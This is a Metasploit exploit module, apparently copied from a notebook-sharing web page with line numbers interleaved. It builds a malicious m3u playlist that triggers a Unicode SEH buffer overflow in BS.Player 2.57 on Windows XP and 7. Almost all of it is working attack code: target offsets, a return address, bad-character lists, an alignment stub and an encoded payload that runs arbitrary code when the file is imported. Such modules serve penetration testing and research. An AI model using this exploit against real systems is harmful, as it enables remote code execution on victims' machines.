Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'BS.Player 2.57 Buffer Overflow (Unicode SEH)',
15
      'Description'    => %q{
16
          This module exploits a buffer overflow in BS.Player 2.57. When
17
        the playlist import is used to import a specially crafted m3u file,
18
        a buffer overflow occurs allowing arbitrary code execution.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'C4SS!0 G0M3S ', # Original Exploit
24
          'Chris Gabriel', # MSF Module
25
          #Greets: Corelan team for mona.py & awesome tutorials
26
        ],
27
      'References'     =>
28
        [
29
          [ 'OSVDB', '82528' ],
30
          [ 'EDB', '15934' ]
31
        ],
32
      'DefaultOptions'  =>
33
        {
34
          'EXITFUNC' => 'process',
35
          #'InitialAutoRunScript' => 'migrate -f',
36
        },
37
      'Platform'       => 'win',
38
      'Payload'        =>
39
        {
40
          'Space'           => 2000,
41
          'BadChars'        => "\x00\x0a\x0d\x1a\x80",
42
          'DisableNops'     => true,
43
          'StackAdjustment' => -3500,
44
        },
45

46
      'Targets'        =>
47
        [
48
          [ 'Windows XP',
49
            {
50
              # pop ecx # pop ebp # ret 0c
51
              # ASLR: False, Rebase: False, SafeSEH: False
52
              # v2.5.7.1051 (bsplayer.exe)
53
              'Ret'     => "\x2f\x49",
54
              'Offset'  => 4102,
55
              'Padding' => 1879
56
            }
57
          ],
58
          [ 'Windows 7',
59
            {
60
              # pop ecx # pop ebp # ret 0c
61
              # ASLR: False, Rebase: False, SafeSEH: False
62
              # v2.5.7.1051 (bsplayer.exe)
63
              'Ret'     => "\x2f\x49",
64
              'Offset'  => 4102,
65
              'Padding' => 1931
66
            }
67
          ],
68
        ],
69
      'Privileged'     => false,
70
      'DisclosureDate' => '2010-01-07',
71
      'DefaultTarget'  => 0))
72

73
    register_options(
74
      [
75
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
76
      ])
77

78
  end
79

80
  def exploit
81

82
    nseh = "\x61\x42"
83

84
    align  = ''
85
    align << "\x58"	# POP EAX
86
    align << "\x6d"	# PAD
87
    align << "\x58"	# POP EAX
88
    align << "\x6d"	# PAD
89
    align << "\x58"	# POP EAX
90
    align << "\x6d"	# PAD
91
    align << "\x58"	# POP EAX
92
    align << "\x6d"	# PAD
93
    align << "\x58"	# POP EAX
94
    align << "\x6d"	# PAD
95
    align << "\x58"	# POP EAX
96
    align << "\x6d"	# PAD
97
    align << "\x58"	# POP EAX
98
    align << "\x6d"	# PAD
99
    align << "\x58"	# POP EAX
100
    align << "\x6d"	# PAD
101
    align << "\x58"	# POP EAX
102
    align << "\x6d"	# PAD
103
    align << "\x58"	# POP EAX
104
    align << "\x6d"	# PAD
105
    align << "\x58"	# POP EAX
106
    align << "\x6d"	# PAD
107
    align << "\x58"	# POP EAX
108
    align << "\x6d"	# PAD
109
    align << "\x58"	# POP EAX
110
    align << "\x6d"	# PAD
111
    align << "\x50"	# PUSH EAX
112
    align << "\x6d"	# PAD
113
    align << "\xc3"	# RET
114

115
    enc = framework.encoders.create('x86/unicode_mixed')
116
    register_to_align_to = "EAX"
117
    enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })
118
    unicodepayload = enc.encode(payload.encoded, nil, nil, platform)
119

120
    padding = rand_text_alpha_lower(target['Padding'])
121

122
    buffer  = "http://"
123
    buffer << rand_text_alpha_lower(target['Offset'])
124
    buffer << nseh
125
    buffer << target['Ret']
126
    buffer << align
127
    buffer << padding
128
    buffer << unicodepayload
129

130
    file_create(buffer)
131

132
  end
133
end
134

135